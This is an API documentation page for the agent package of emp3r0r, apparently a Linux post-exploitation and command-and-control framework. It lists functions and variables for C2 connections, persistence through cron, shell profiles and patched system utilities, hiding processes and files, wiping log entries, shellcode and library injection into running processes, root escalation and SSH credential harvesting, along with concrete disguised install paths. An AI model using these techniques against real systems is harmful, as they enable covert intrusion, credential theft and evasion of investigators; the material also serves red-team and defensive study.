Documentation ¶
Index ¶
- Variables
- func AddCronJob(job string) error
- func AddNeededLib(elf_file, lib_file string) (err error)
- func ApplyRuntimeConfig() (err error)
- func BroadcastMsg(msg, dst string) (err error)
- func BroadcastServer(ctx context.Context, cancel context.CancelFunc, port string) (err error)
- func C2CommandsHandler(cmdSlice []string) (out string)
- func CCMsgTun(ctx context.Context, cancel context.CancelFunc) (err error)
- func CheckAccount(username string) (accountInfo map[string]string, err error)
- func CheckAgentProcess() *emp3r0r_data.AgentProcess
- func CheckContainer() string
- func CheckIn() (err error)
- func CleanAllByKeyword(keyword string) (err error)
- func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo
- func ConnectCC(url string) (conn *h2conn.Conn, ctx context.Context, cancel context.CancelFunc, err error)
- func CopyProcExeTo(pid int, dest_path string) (err error)
- func CopySelfTo(dest_file string) (err error)
- func DownloadViaCC(file_to_download, path string) (data []byte, err error)
- func ExtractBash() error
- func FixELF(elf_path string) (err error)
- func GDBInjectLoader(pid int) error
- func GDBInjectSharedLib(pid int) error
- func GetKernelVersion() (uname string)
- func GetLibc(pid int) (path string, addr, offset int64, err error)
- func GetRoot() error
- func GetSymFromLibc(pid int, sym string) (addr int64, err error)
- func HasRoot() bool
- func HidePIDs() (err error)
- func InjectLoader(pid int) error
- func InjectSharedLib(so_path string, pid int) (err error)
- func InjectorHandler(pid int, method string) (err error)
- func IsAgentAlive(c net.Conn) bool
- func IsAgentRunningPID() (bool, int)
- func IsCCOnline(proxy string) bool
- func IsELF(file string) bool
- func IsStaticELF(file_path string) bool
- func KCPClient()
- func PersistAllInOne() (final_err error)
- func PortFwd(addr, sessionID, protocol string, reverse bool, timeout int) (err error)
- func ProcUID(pid int) string
- func RunShellScript(scriptBytes []byte) (output string, err error)
- func SSHD(shell, port string, args []string) (err error)
- func Screenshot() (path string, err error)
- func Send2CC(data *emp3r0r_data.MsgTunData) error
- func SetPath()
- func SetProcessName(name string)
- func SftpHandler(sess ssh.Session)
- func ShadowsocksC2Client()
- func ShellcodeInjector(shellcode *string, pid int) error
- func Socks5Proxy(op string, addr string) (err error)
- func StartBroadcast(start_socks5 bool, ctx context.Context, cancel context.CancelFunc)
- func Upgrade(checksum string) (out string)
- func VaccineHandler() (out string)
- type OSInfo
- type PortFwdSession
Constants ¶
This section is empty.
Variables ¶
var ( // PersistMethods CC calls one of these methods to get persistence, or all of them at once // look at emp3r0r_data.PersistMethods too PersistMethods = map[string]func() error{ "profiles": profiles, "cron": cronJob, "patcher": patcher, } // Hidden_PIDs list of hidden files/pids // see loader.c Hidden_PIDs = "/usr/share/at/batch-job.at" Hidden_Files = "/usr/share/at/daily-job.at" // Patched_List list of patched sys utils Patched_List = []string{ "/usr/bin/ls", "/usr/bin/dir", "/usr/bin/ps", "/usr/bin/pstree", "/usr/bin/netstat", "/usr/sbin/sshd", "/usr/bin/bash", "/usr/bin/sh", "/usr/bin/ss", } // EmpLocations all possible locations EmpLocations = []string{ "/env", "/usr/bin/x", "/usr/bin/.env", "/usr/local/bin/env", "/bin/.env", "/usr/share/man/man1/arch.gz", "/usr/share/man/man1/ls.1.gz", "/usr/share/man/man1/arch.5.gz", } EmpLocationsNoRoot = []string{ "/tmp/.env", "/dev/shm/.env", fmt.Sprintf("%s/.wget-hst", os.Getenv("HOME")), fmt.Sprintf("%s/.less-hist", os.Getenv("HOME")), fmt.Sprintf("%s/.sudo_as_admin_successful", os.Getenv("HOME")), fmt.Sprintf("%s/.env", os.Getenv("HOME")), fmt.Sprintf("%s/.pam", os.Getenv("HOME")), } )
HandShakes record each hello message and C2's reply
var ( // PortFwds manage port mappings PortFwds = make(map[string]*PortFwdSession) // PortFwdsMutex lock map PortFwdsMutex = &sync.Mutex{} )
var ReverseConns = make(map[string]context.CancelFunc)
ReverseConns record ssh reverse proxy sessions
var RuntimeConfig = &emp3r0r_data.Config{}
var SS_Ctx, SS_Cancel = context.WithCancel(context.Background())
Functions ¶
func AddCronJob ¶
AddCronJob add a cron job without terminal this creates a cron job for whoever runs the function
func AddNeededLib ¶
AddNeededLib: Add a needed library to an ELF file, lib_file needs to be full path
func ApplyRuntimeConfig ¶
func ApplyRuntimeConfig() (err error)
func BroadcastMsg ¶
BroadcastMsg send a broadcast message on a network
func BroadcastServer ¶
BroadcastServer listen on a UDP port for broadcasts wait for some other agents to announce their internet proxy
func C2CommandsHandler ¶
func CCMsgTun ¶
func CCMsgTun(ctx context.Context, cancel context.CancelFunc) (err error)
CCMsgTun use the connection (CCConn)
func CheckAccount ¶
CheckAccount : check account info by parsing /etc/passwd
func CheckAgentProcess ¶
func CheckAgentProcess() *emp3r0r_data.AgentProcess
CheckAgentProcess fill up info.emp3r0r_data.AgentProcess
func CheckContainer ¶
func CheckContainer() string
func CleanAllByKeyword ¶
CleanAllByKeyword delete any entries containing keyword in ALL known log files
func CollectSystemInfo ¶
func CollectSystemInfo() *emp3r0r_data.AgentSystemInfo
CollectSystemInfo build system info object
func ConnectCC ¶
func ConnectCC(url string) (conn *h2conn.Conn, ctx context.Context, cancel context.CancelFunc, err error)
ConnectCC connect to CC with h2conn
func CopyProcExeTo ¶
CopyProcExeTo copy executable of an process to dest_path
func CopySelfTo ¶
Copy current executable to a new location
func DownloadViaCC ¶
DownloadViaCC download via EmpHTTPClient if path is empty, return []data instead
func ExtractBash ¶
func ExtractBash() error
ExtractBash extract embedded bash binary and configure our bash shell
func GetKernelVersion ¶
func GetKernelVersion() (uname string)
func GetLibc ¶
GetLibc get base address, ASLR offset value, and path of libc by parsing /proc/pid/maps
func GetSymFromLibc ¶
GetSymFromLibc: Get pointer to a libc function that is currently loaded in target process, ASLR-proof
func InjectLoader ¶
InjectLoader inject loader.so into any process, using shellcode locate __libc_dlopen_mode in memory then use it to load SO
func InjectSharedLib ¶
inject a shared library into target process
func InjectorHandler ¶
InjectorHandler handles `injector` module
func IsAgentAlive ¶
is the agent alive? connect to emp3r0r_data.SocketName, send a message, see if we get a reply
func IsAgentRunningPID ¶
IsAgentRunningPID is there any emp3r0r agent already running?
func IsStaticELF ¶
func PersistAllInOne ¶
func PersistAllInOne() (final_err error)
PersistAllInOne run all persistence method at once
func PortFwd ¶
PortFwd port mapping, receive request data then send it to target port on remote address addr: when reversed, addr should be port
func RunShellScript ¶
RunShellScript runs a bash script on target
func Screenshot ¶
Screenshot take a screenshot returns path of taken screenshot
func SetPath ¶
func SetPath()
SetPath get current PATH variable and append it with common paths, then remove duplicates
func SetProcessName ¶
func SetProcessName(name string)
SetProcessName rename agent process by modifying its argv, all cmdline args are dropped
func ShadowsocksC2Client ¶
func ShadowsocksC2Client()
Start ShadowsocksC2Client client, you get a SOCKS5 proxy server at *:Runtime.ShadowsocksPort This proxy server is responsible for encapsulating C2 traffic
func ShellcodeInjector ¶
ShellcodeInjector inject shellcode to arbitrary running process target process will be restored after shellcode has done its job
func Socks5Proxy ¶
Socks5Proxy sock5 proxy server on agent, listening on addr op: on/off
func StartBroadcast ¶
func StartBroadcast(start_socks5 bool, ctx context.Context, cancel context.CancelFunc)
func VaccineHandler ¶
func VaccineHandler() (out string)
Types ¶
type OSInfo ¶
type OSInfo struct { Name string `json:"name,omitempty"` Vendor string `json:"vendor,omitempty"` Version string `json:"version,omitempty"` Release string `json:"release,omitempty"` Architecture string `json:"architecture,omitempty"` Kernel string `json:"kernel,omitempty"` }
OSInfo information.
type PortFwdSession ¶
type PortFwdSession struct { Addr string // is a listener when `reverse` is set, a dialer when used normally Conn *h2conn.Conn Ctx context.Context Cancel context.CancelFunc }
PortFwdSession manage a port fwd session
Source Files ¶
- account.go
- account_linux.go
- bash.go
- broadcast.go
- c2cmds.go
- c2cmds_linux.go
- ccHandler.go
- config.go
- elf.go
- ftp.go
- getroot.go
- injector.go
- kcp.go
- mod.go
- osinfo.go
- osinfo_linux.go
- persistence.go
- poll.go
- proc.go
- proc_linux.go
- proxy.go
- run_script.go
- run_script_linux.go
- screenshot_linux.go
- set_path.go
- sftp.go
- shellcode.go
- shellcode_inject_amd64_linux.go
- shellhelpers.go
- ss.go
- ssh_harvester_amd64_linux.go
- sshd.go
- sshd_linux.go
- util.go
- vaccine.go
- virt.go
- virt_linux.go
- xtmp.go